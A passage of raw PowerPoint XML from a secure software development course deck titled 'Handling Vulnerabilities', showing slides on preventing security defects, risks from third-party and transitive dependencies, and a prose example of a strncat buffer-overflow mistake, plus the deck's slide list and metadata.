          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What steps might you take to promote secure practices among your own software development team?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1108728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a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Activity: Preventing Security Defects </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7315200" y="5121808"/>
            <a:ext cx="1725124" cy="1630038"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Speech Bubble: Rectangle with Corners Rounded 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1790554" y="1152525"/>
            <a:ext cx="7163630" cy="849629"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -54606"/>
              <a:gd name="adj2" fmla="val 44263"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="95000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="3175" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="914400"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>A security defect was reported in my application. After several hours recreating the problem and tracing it to the source, I figured out that the problem is in a third-party framework that I used for development. How might I have prevented this problem?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" defTabSz="914400"/>
            <a:endParaRPr lang="en-US" sz="1400" b="1" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Speech Bubble: Rectangle with Corners Rounded 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1790554" y="2143125"/>
            <a:ext cx="7163630" cy="1257985"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -54473"/>
              <a:gd name="adj2" fmla="val -50499"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="95000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="3175" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="914400"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>After some more investigation, I figured out that the security defect wasn't directly in the third-party component I used, but in a fourth-party component that the third-party component used. In other words, the problem was in a dependency of a dependency. With so many dependencies and sub-dependencies, how can I possibly avoid introducing security problems in my software when I use reusable components?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" defTabSz="914400"/>
            <a:endParaRPr lang="en-US" sz="1400" b="1" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Speech Bubble: Rectangle with Corners Rounded 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1790554" y="3535785"/>
            <a:ext cx="7163630" cy="1451347"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -55270"/>
              <a:gd name="adj2" fmla="val -4088"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="95000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="3175" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>This is the first time I've programmed in the C language. I wrote a function that manipulates some text strings using the C Standard Library strncat( ) function to append one string to another. Apparently, I misunderstood one of the parameters. While I should have specified the size of space remaining in the buffer to accept the characters I was appending, I actually specified the total number of characters in the entire buffer. As a result, I introduced a buffer overflow defect into the program. How can I avoid creating problems like this in the future?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5122" name="Picture 2" descr="customer,person,people,woman,user,cli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60" y="1217790"/>
            <a:ext cx="1698509" cy="16985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erson,user,customer,man,male,man,boy,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10" y="3545310"/>
            <a:ext cx="1698509" cy="169850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3889" y="5121808"/>
            <a:ext cx="1371600" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="95000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="3175" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="76200" dir="18900000" sy="23000" kx="-1200000" algn="bl" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="20000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
          <a:scene3d>
            <a:camera prst="isometricOffAxis2Left">
              <a:rot lat="1080000" lon="2400000" rev="0"/>
            </a:camera>
            <a:lightRig rig="threePt" dir="t"/>
          </a:scene3d>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="914400"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" kern="0" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Developer Dave</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Rectangle 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="33889" y="2769389"/>
            <a:ext cx="1371600" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="95000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="3175" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="76200" dir="18900000" sy="23000" kx="-1200000" algn="bl" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="20000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
          <a:scene3d>
            <a:camera prst="isometricOffAxis2Left">
              <a:rot lat="1080000" lon="2400000" rev="0"/>
            </a:camera>
            <a:lightRig rig="threePt" dir="t"/>
          </a:scene3d>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="914400"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" kern="0" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Developer Doris</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1981580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a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="341925" y="1302040"/>
            <a:ext cx="8421075" cy="4920960"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Modern applications may be a technology soup of third-party components,</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>which may introduce security problems:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Host operating system and application runtime environment</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>may be misconfigured</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Libraries, frameworks, user interface controls, and other </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>modules typically run with full system privileges,</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>which may be compromised</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Mobile device system and firmware</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>which may be rooted or otherwise compromised</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cloud service APIs may be unsecure or may be</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>used inappropriately</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Problems in Third-Party Code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="Group 4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6172200" y="2476720"/>
            <a:ext cx="2280698" cy="3783151"/>
            <a:chOff x="3111867" y="2959180"/>
            <a:chExt cx="1644843" cy="2728414"/>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1867" y="2959180"/>
              <a:ext cx="1644843" cy="2728414"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Rectangle 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3245461" y="3358033"/>
              <a:ext cx="1447800" cy="396682"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" lIns="91440" tIns="45720" rIns="91440" bIns="45720">
              <a:prstTxWarp prst="textCanDown">
                <a:avLst>
                  <a:gd name="adj" fmla="val 29009"/>
                </a:avLst>
              </a:prstTxWarp>
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1100" cap="none" spc="0" dirty="0">
                  <a:ln w="9525">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:effectLst>
                    <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                      <a:prstClr val="black">
                        <a:alpha val="40000"/>
                      </a:prstClr>
                    </a:outerShdw>
                  </a:effectLst>
                </a:rPr>
                <a:t> DEVELOPERS </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Rectangle 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3300800" y="4702838"/>
              <a:ext cx="1358020" cy="397200"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" lIns="91440" tIns="45720" rIns="91440" bIns="45720">
              <a:prstTxWarp prst="textCanDown">
                <a:avLst>
                  <a:gd name="adj" fmla="val 33333"/>
                </a:avLst>
              </a:prstTxWarp>
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1100" b="1" cap="none" spc="0" dirty="0">
                  <a:ln w="9525">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="BF1128"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> TECHNOLOGY </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Rectangle 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3506206" y="3954619"/>
              <a:ext cx="894471" cy="165449"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" lIns="91440" tIns="45720" rIns="91440" bIns="45720">
              <a:prstTxWarp prst="textCanDown">
                <a:avLst>
                  <a:gd name="adj" fmla="val 25775"/>
                </a:avLst>
              </a:prstTxWarp>
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1100" b="1" cap="none" spc="0" dirty="0">
                  <a:ln w="3175">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="BF6E35"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>CONDENSED</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3426986844"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="CNX">
  <a:themeElements>
    <a:clrScheme name="CNX 1">
      <a:dk1>
        <a:srgbClr val="000000"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="000000"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="FFFFFF"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="009DDC"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="1D76BB"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="F05323"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="1D3764"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="C1C5C9"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="009DDC"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="009DDC"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="009D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7" id="{28BAE127-A3FD-A04B-A586-7D7FEDE49638}" vid="{6F1373EB-6DC0-594B-9B1F-E3850451F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CNX</Template>
  <TotalTime>285</TotalTime>
  <Words>7996</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>836</Paragraphs>
  <Slides>73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Courier New</vt:lpstr>
      <vt:lpstr>CNX</vt:lpstr>
      <vt:lpstr>Handling Vulnerabilities</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Software Defects</vt:lpstr>
      <vt:lpstr>Causes of Software Defects</vt:lpstr>
      <vt:lpstr>Build Security into Your Design Processes</vt:lpstr>
      <vt:lpstr>Prevent Coding Defects</vt:lpstr>
      <vt:lpstr>Identify and Correct Security Issues During Development</vt:lpstr>
      <vt:lpstr>Activity: Preventing Security Defects </vt:lpstr>
      <vt:lpstr>Problems in Third-Party Code</vt:lpstr>
      <vt:lpstr>Problems in Standard Libraries</vt:lpstr>
      <vt:lpstr>Dependencies</vt:lpstr>
      <vt:lpstr>Encryption Validation</vt:lpstr>
      <vt:lpstr>Security of Host Systems and Service Providers</vt:lpstr>
      <vt:lpstr>Determine Whether to Use Third-Party Code and Services</vt:lpstr>
      <vt:lpstr>Select Third-Party Code and Services for Use in Your Project</vt:lpstr>
      <vt:lpstr>Keep Apprised of Vulnerabilities  in Third-Party Code and Services</vt:lpstr>
      <vt:lpstr>Host Platform Configuration</vt:lpstr>
      <vt:lpstr>Hypervisor Vulnerabilities</vt:lpstr>
      <vt:lpstr>Prevent Configuration Vulnerabilities (Slide 1 of 2)</vt:lpstr>
      <vt:lpstr>Prevent Configuration Vulnerabilities (Slide 2 of 2)</vt:lpstr>
      <vt:lpstr>Prevent Vulnerabilities in Virtual Machine Infrastructure</vt:lpstr>
      <vt:lpstr>Activity: Identifying Vulnerabilities  in a Software Project</vt:lpstr>
      <vt:lpstr>Activity: Examining the Project Files</vt:lpstr>
      <vt:lpstr>Error Messaging (Slide 1 of 2)</vt:lpstr>
      <vt:lpstr>Error Messaging (Slide 2 of 2)</vt:lpstr>
      <vt:lpstr>Error Handling (Slide 1 of 3)</vt:lpstr>
      <vt:lpstr>Error Handling (Slide 2 of 3)</vt:lpstr>
      <vt:lpstr>Error Handling (Slide 3 of 3)</vt:lpstr>
      <vt:lpstr>Fail-Safe</vt:lpstr>
      <vt:lpstr>Failure Recovery</vt:lpstr>
      <vt:lpstr>Implement Secure Error Handling (Slide 1 of 2)</vt:lpstr>
      <vt:lpstr>Implement Secure Error Handling (Slide 2 of 2)</vt:lpstr>
      <vt:lpstr>Prevent Information Disclosure</vt:lpstr>
      <vt:lpstr>Implement Fail-Safe Design</vt:lpstr>
      <vt:lpstr>Activity: Identifying Software Defects and Misconfiguration</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>The Human Element in Software Security</vt:lpstr>
      <vt:lpstr>Vulnerabilities Attributed to the Human Element (Slide 1 of 2)</vt:lpstr>
      <vt:lpstr>Vulnerabilities Attributed to the Human Element (Slide 2 or 2)</vt:lpstr>
      <vt:lpstr>Social Engineering Attacks</vt:lpstr>
      <vt:lpstr>User Input </vt:lpstr>
      <vt:lpstr>Input Validation (Slide 1 of 5)</vt:lpstr>
      <vt:lpstr>Input Validation (Slide 2 of 5)</vt:lpstr>
      <vt:lpstr>Input Validation (Slide 3 of 5)</vt:lpstr>
      <vt:lpstr>Input Validation (Slide 4 of 5)</vt:lpstr>
      <vt:lpstr>Input Validation (Slide 5 of 5)</vt:lpstr>
      <vt:lpstr>Security Policy Enforcement</vt:lpstr>
      <vt:lpstr>Design the User Interface for Clarity and Simplicity </vt:lpstr>
      <vt:lpstr>Promote Secure User Behavior</vt:lpstr>
      <vt:lpstr>Enforce Security Policies</vt:lpstr>
      <vt:lpstr>Limit User Input</vt:lpstr>
      <vt:lpstr>Establish and Enforce a Strong Authentication Policy</vt:lpstr>
      <vt:lpstr>Activity: Managing People Risks</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Development Process Approaches</vt:lpstr>
      <vt:lpstr>Building Security In (Slide 1 of 2)</vt:lpstr>
      <vt:lpstr>Building Security In (Slide 2 of 2)</vt:lpstr>
      <vt:lpstr>The CIA Triad</vt:lpstr>
      <vt:lpstr>Business Requirements and Specifications</vt:lpstr>
      <vt:lpstr>Evaluating Security Requirements</vt:lpstr>
      <vt:lpstr>Design Phase</vt:lpstr>
      <vt:lpstr>Development Phase</vt:lpstr>
      <vt:lpstr>Testing Phase</vt:lpstr>
      <vt:lpstr>Security Testing Tools</vt:lpstr>
      <vt:lpstr>Deployment Phase</vt:lpstr>
      <vt:lpstr>Maintenance Phase</vt:lpstr>
      <vt:lpstr>Development Process Security</vt:lpstr>
      <vt:lpstr>Integrate Security into Your Development Processes</vt:lpstr>
      <vt:lpstr>Follow Principles of Security Design</vt:lpstr>
      <vt:lpstr>Secure the Development Environment (Slide 1 of 2)</vt:lpstr>
      <vt:lpstr>Secure the Development Environment (Slide 2 of 2)</vt:lpstr>
      <vt:lpstr>Activity: Managing Software Development Process Risks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Handling Vulnerabilities</dc:title>
  <dc:creator>Brian Sullivan</dc:creator>
  <cp:lastModifiedBy>Michelle Farney</cp:lastModifiedBy>
  <cp:revision>18</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-03-16T18:51:25Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-04-14T21:02:23Z</dcterms:modified>
</cp:coreProperties>
</file>